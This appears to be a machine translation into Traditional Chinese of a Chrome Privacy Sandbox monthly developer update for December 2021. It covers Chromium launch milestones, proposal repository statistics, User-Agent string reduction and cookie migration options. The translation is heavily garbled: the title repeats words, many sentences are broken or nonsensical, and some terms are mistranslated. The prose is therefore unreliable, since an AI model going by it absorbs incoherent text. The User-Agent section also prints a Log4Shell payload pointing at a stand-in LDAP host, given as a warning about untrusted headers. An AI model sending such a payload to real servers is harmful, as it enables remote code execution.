歡迎閱讀 2021 年《The Progress in the Privacy in the Privacy》 沙箱、追蹤 Chrome 將逐步淘汰第三方 Cookie,並努力達成 私人網路。我們通常會分享 Privacy Sandbox 的更新簡介 時間軸及 然而 12 月是個安靜的月份相反地 並列出幾種可能可行的解決方案 迎接新的一年
Chromium 開發程序
如要在 Chromium 中載入新的網路平台功能,必須完成 專案的開放式開發作業 程序。在 2021 年, Privacy Sandbox 團隊製作的內容:
| 🥚 | 目的在於原型 | 19 |
| 🧪 | 意圖進行實驗 | 7 分 |
| 🚀 | 有意出貨 | 11 |
各個里程碑也會邀請更廣大的網路生態系統做出貢獻。
意圖設計原型是第一個查核點,我們會邀請使用者進行討論 早期實驗也就是說,您可以在 GitHub 提供提案。 您可以提出問題或加入討論和 標準簡報 群組,例如 W3C 和 IETF也是程式碼開始的位置,這表示您可以預期 向開發人員 功能 旗標。 初步意見回饋是驗證及反覆改進提案的關鍵。
意圖進行實驗是選用步驟, 來源試用。開發人員可以申請來源 測試功能,然後在實際工作環境中進行測試。 我們之所以要做實驗,是因為這項功能有特定面向 也希望在實際環境中進行驗證可以測試並 分享測試結果 持續改善這個功能
意圖運送是最終里程碑,表示功能現已 完成並準備就緒,可正式發布通過核准後,功能就會 然後逐步進行初期測試、Beta 版測試 以及穩定版請務必使用 Canary 版和 Chrome Beta 版,藉此偵測並 在功能推出穩定版前回報任何錯誤。
提案
每項 Privacy Sandbox 提案都有專屬的 GitHub 存放區。A 罩杯 存放區代管說明文件來總結整體功能 各種瀏覽器實作規格,以及 建構出「問題」和「提取要求」形式的網路生態系統
在 14 個 Privacy Sandbox 存放區中,我們達成了下列成果:
| 💬 | 545 | 已建立問題 |
| 250 | 問題已解決 | |
| 🛠️ | 261 | 已建立提取要求 |
| 223 | 已合併提取要求 |
說明內容和規格的語言通常以目標對象為目標對象 相當熟悉標準和瀏覽器的開發方式 如果不熟悉的話,這麼做會很困難但說明功能的目的在於 解釋!如果有些要點不清楚或未涵蓋, 回報問題,以便我們更新並說明說明。
解析作業
使用者代理程式春季大掃除
隨著新年次數減少,我們也將總和計入新年 Chrome 100 和收益增幅 使用者代理程式字串。這不錯 建議您重新檢查程式碼中任何使用者代理程式字串的使用,以確認是否 可能受到這些變更影響
如要找出這些區域,請按照下列步驟操作:
- 在 JavaScript 程式碼中搜尋
navigator.userAgent,或存取 伺服器程式碼中的User-Agent標頭。 - 檢查字串剖析結果是否有 2 位數版本的假設。適用對象
舉例來說,指定
\d\d或\d{2}的規則運算式應替換為\d+。 - 找出任何仰賴以下項目的字串:
- 平台 (作業系統) 版本
- 完整版 Chrome 版本
- 行動裝置名稱
- 這些值日後會縮減為固定字串。如果 您需要存取這些值。請遷移至 User-Agent Client 提示。
12 月有重大更新需要提及,如果您採用的是 User-Agent Client
提示,我們已將 Intent 傳送到 ,以啟用委派提示給其他
起點
HTML
或是透過 <meta> 標記傳送例如:
<meta name="accept-ch" content="sec-ch-ua-model=( https://foo.bar )">
如果你很熱情的春天大掃除,也可以考慮 使用使用者代理程式的替代選項。假如您使用字串 偵測行動裝置,然後調查能否換成回應式 設計。如果您要檢查瀏覽器名稱和版本是否支援功能,請參閱 可以改用特徵偵測功能
請務必記住,就像任何客戶提供的用戶端一樣
的值,並不保證準確無誤或甚至提供。最新的 Log4j
安全漏洞,「Log4shell」
並提供這類風險的例子將使用者代理程式字串設為
加入 ${jndi:ldap://example.com/file} 之類的值,或許就能取得網站
以便主動在伺服器上剖析
Cookie 分類
另一個傳統的新年活動是確保自己處於快樂狀態
提供大量健康食材的餅乾隨著我們持續邁向
在逐步淘汰第三方 Cookie 的過程中
您網站的哪些 Cookie 會受到影響2020 年成為起點
需要將跨網站或第三方 Cookie 的所有 Cookie
使用方式
搭配 SameSite=None。
凡是將 SameSite 屬性設為 None 的 Cookie,都必須提供
更新。
目前有三種方法可以考慮:
- 如果您只需要建立與頂層網站 1:1 關係的 Cookie,
然後追蹤 CHIPS 的進度
。也就是將
將
Partitioned屬性設為 Cookie。 - 如果在跨網站環境中使用 Cookie,但只會在您擁有的整個網站上使用
則或許會是第一方
組合。就需要定義
並在 Cookie 中加入
SameParty屬性。 - 如果 Cookie 是用來提供某種形式的共用值 請深入探索更多 Privacy Sandbox 平台 提供的替代解決方案 需要跨網站追蹤
如果你感到特別有心理準備,也是理想時間 以便重新審視您所有的 Cookie 使用狀況,因為我們有一份實用的食譜,能夠有效提升您的 第一方 Cookie
意見回饋
我們會持續發布這些每月更新內容,並 整體而言,Privacy Sandbox,我們希望確保開發人員 取得所需資訊請透過 @ChromiumDev 告訴我們 Twitter 其他改善做法我們會根據您的意見持續改善格式。
請參閱 Privacy Sandbox 常見問題, 根據您提交給開發人員支援團隊的問題,持續擴大涵蓋範圍 存放區。如果發生以下情況: 對於任何提案的測試或導入有任何疑問 過來這裡吧